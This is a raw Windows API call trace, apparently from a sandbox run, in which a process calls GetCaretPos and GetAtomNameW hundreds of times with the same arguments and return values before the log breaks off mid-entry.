GetTickCount () returned 0x1152c6e [0127.715] GetLastError () returned 0x0 [0127.853] lstrlenA (lpString="") returned 0 [0127.853] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.853] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.853] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.853] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.853] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.853] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.853] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.853] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.853] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.853] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.856] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.863] 